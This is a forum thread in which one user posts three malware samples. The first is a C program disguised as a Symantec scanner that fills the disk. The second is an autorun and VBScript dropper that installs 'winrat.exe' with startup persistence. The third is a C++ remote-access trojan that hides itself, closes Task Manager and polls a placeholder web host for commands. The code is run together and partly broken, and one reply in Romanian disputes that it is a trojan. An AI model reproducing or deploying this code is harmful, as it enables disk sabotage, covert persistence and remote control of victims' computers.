Zaraky Posted June 4, 2012 Report Posted June 4, 2012 (edited) #include<stdio.h>#include<conio.h>#include<dos.h>#include<stdlib.h>FILE *a,*t,*b;int r,status,vir_count;double i;char ch[]="CREATION OF A SPECIAL FILE FOR SPACE OCCUPYING HARDDISK",choice;void eatspace(void);void findroot(void);void showstatus(void);void draw(void);void accept(void);void main(){draw();accept();textcolor(WHITE);draw();gotoxy(12,8);cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");sleep(3);gotoxy(12,8);delline();cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");getch();gotoxy(12,8);delline();findroot();}void accept(){textcolor(LIGHTRED);gotoxy(1,8);cputs("This program is a Trojan horse SIMPLE DEMO. If you run this program it will \ n \ REAT your space FULL ON HARD DISK DRIVE ROOT. HOWEVER AND 'POSSIBLE\n\rEELIMINATE THE DANNOE.\n\n\rTo fix the damage that 'VE \ TO DELETE THE FILES \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rSE you want to run the program, press ENTER, otherwise press any key to exitif((choice=getch())!=13)exit(0);}void draw(){clrscr();textcolor(WHITE);gotoxy(12,2);cputs("********************************************************");gotoxy(12,6);cputs("********************************************************");gotoxy(12,3);cputs("*\n\b*\n\b*\n\b");gotoxy(67,3);cputs("*\n\b*\n\b*\n\b");gotoxy(14,4);cputs("SSYMANTEC SECURITY SCAN - 2009 (RAPID SCANNER SYSTEM)");}void findroot(){t=fopen("C:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);textcolor(WHITE);a=fopen("C:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");getch();exit(1);}b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}t=fopen("D:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);a=fopen("D:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");getch();exit(1);}b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}t=fopen("E:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);a=fopen("E:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");getch();exit(1);}b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}t=fopen("F:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);a=fopen("F:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");getch();exit(1);}b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}if(t==NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SCAN SYSTEM FAILED! Press any key to exit the program.");getch();exit(1);}exit(1);}void eatspace(){textcolor(LIGHTRED);gotoxy(12,16);cputs("NOTICE: Do not abort the scanning process to completion!\n");textcolor(WHITE);gotoxy(12,18);while(1){for(r=1;r<4;r++){for(i=1;i<900000;i++){status=fputs(ch,;if(status==EOF){textcolor(WHITE);vir_count=random(120);draw();gotoxy(12,8);cprintf("Scanning complete!. Detected and eliminated MINACCE d su%d",vir_count);gotoxy(12,10);cprintf("Press any key to CLOSE...");getch();break;}}cputs(".");if(status==EOF) break;}if(status==EOF) break;}exit(0);}void showstatus(){gotoxy(12,8);cputs("Scan your system for threats");gotoxy(12,10);cputs("This can take up FEW MINUTES FOR A FEW HOURS");gotoxy(12,13);cputs("SCAN IN PROGRESS. WAIT...");}or-Open Notepad (autorun.inf)[AutoRun]open=wscript go.vbsgo.vbsDim FSO,FileDim Date,Hour,Day,Backuppath,DaystringSet FSO = CreateObject("Scripting.FileSystemObject")If Fso.FolderExists ("C:\Windows\trojan") ThenSet File= FSO.GetFile("C:\Windows\trojan\winrat.exe")Date=File.DateLastModifiedDay=DatePart("y",Date)Daystring=CStr(Day)Backuppath="C:\Windows\trojanbackup"+DaystringFso.MoveFolder "C:\Windows\trojan", BackuppathEnd IfFSO.CopyFolder ".\trojan", "c:\Windows\trojan", trueSet oShell = CreateObject("WScript.Shell")oShell.Run "C:\Windows\trojan\winrat.exe"If Fso.FolderExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\") ThenIf Fso.FileExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Trojan.lnk") ThenElseFSO.CopyFile "c:\Windows\trojan\Trojan.lnk","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", trueEnd IfEnd Ifwscript.quitor001 #include <windows.h>002 #pragma comment(lib, "Winmm.lib")003 #include <urlmon.h>004 #pragma comment(lib, "urlmon.lib")005 #include <iostream>006 #include <fstream>007 #include <WinInet.h>008 #pragma comment(lib, "WinInet.lib")009 #include <ShlObj.h>010 using namespace std;011 012 int Option, Assign, Target;013 DWORD WINAPI LowProfile(LPVOID);014 DWORD WINAPI Option1(LPVOID);015 DWORD WINAPI Option2(LPVOID);016 DWORD WINAPI Option3(LPVOID);017 DWORD WINAPI Option4(LPVOID);018 DWORD WINAPI Option5(LPVOID);019 // Add more lines of Option6, Option7, etc. to create more commands.020 HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;021 022 int main() {023 // Hide Console Window024 FreeConsole();025 026 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);027 028 // Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. You can change assign.txt in the PHP file BEFORE you plug in the U3 drive.029 FILE *istream;030 if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {031 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);032 } else {033 }034 035 // Store Assign.txt in a variable036 ifstream inAssign;037 inAssign.clear();038 inAssign.open("c:\\Windows\\trojan\\assign.txt");039 inAssign >> Assign;040 inAssign.close();041 inAssign.clear();042 043 // Start the main loop that is downloading the textfile each 5 seconds.044 while(1) {045 046 // Download Option & Target047 remove("c:\\Windows\\trojan\\option.txt");048 remove("c:\\Windows\\trojan\\target.txt");049 DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");050 DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");051 Sleep(100);052 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);053 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);054 055 // Read Option056 ifstream inFile;057 inFile.clear();058 inFile.open("c:\\Windows\\trojan\\option.txt");059 inFile >> Option;060 inFile.close();061 inFile.clear();062 063 // Read Target064 ifstream inTarget;065 inTarget.clear();066 inTarget.open("c:\\Windows\\trojan\\target.txt");067 inTarget >> Target;068 inTarget.close();069 inTarget.clear();070 071 // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan)072 if(Target == Assign || Target == 0) {073 if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }074 else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }075 else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }076 else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }077 else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }078 // Add more of these lines for more commands079 }080 Sleep(5000);081 }082 }083 084 // Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive.085 DWORD WINAPI LowProfile(LPVOID) {086 while(1) {087 // Obvious088 TaskMgr = FindWindow(NULL,L"Windows Task Manager");089 // May popup because of new hardware installation (U3)090 SysError = FindWindow(NULL,L"System Settings Change");091 // Windows Media Player may popup. Rarely happens, but had this once at a school computer.092 WMP = FindWindow(NULL,L"Windows Media Player");093 // The Removable Disk part of the U3 Drive can open automatically.094 Disk1 = FindWindow(NULL,L"(D:) Removable Disk");095 Disk2 = FindWindow(NULL,L"(E:) Removable Disk");096 Disk3 = FindWindow(NULL,L"(F:) Removable Disk");097 Disk4 = FindWindow(NULL,L"(G:) Removable Disk");098 // Autoplay099 Autoplay = FindWindow(NULL,L"Autoplay");100 // Errors caused by our VBScript go.vbs101 VBS = FindWindow(NULL,L"Windows Script Host");102 if( TaskMgr != NULL) {103 SetWindowText( TaskMgr,L"DIE!!!! =O");104 Sleep(500);105 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);106 }107 if( SysError != NULL) {108 PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);109 }110 if( WMP != NULL) {111 Sleep(1000);112 PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);113 }114 if( Disk1 != NULL) {115 PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);116 }117 if( Disk2 != NULL) {118 PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);119 }120 if( Disk3 != NULL) {121 PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);122 }123 if( Disk4 != NULL) {124 PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);125 }126 if( Autoplay != NULL) {127 PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);128 }129 if( VBS != NULL) {130 PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);131 }132 Sleep(500);133 }134 }135 136 //137 // Here we start with our commands. Option1, Option2, Option3, etc.138 // Don't forget to also define and create a process for these Options if you want to create more.139 // Have Fun =D140 //141 142 DWORD WINAPI Option1(LPVOID) { // 1143 return 0;144 }145 146 DWORD WINAPI Option2(LPVOID) { // 2147 return 0;148 }149 150 DWORD WINAPI Option3(LPVOID) { // 3151 return 0;152 }153 154 DWORD WINAPI Option4(LPVOID) { // 4155 return 0;156 }157 158 DWORD WINAPI Option5(LPVOID) { // 5159 return 0;160 } Edited June 4, 2012 by Zaraky Quote
staticwater Posted June 4, 2012 Report Posted June 4, 2012 Am pus Codul. Am vazut codul, ce ai pus tu acolo nu e trojan! Quote
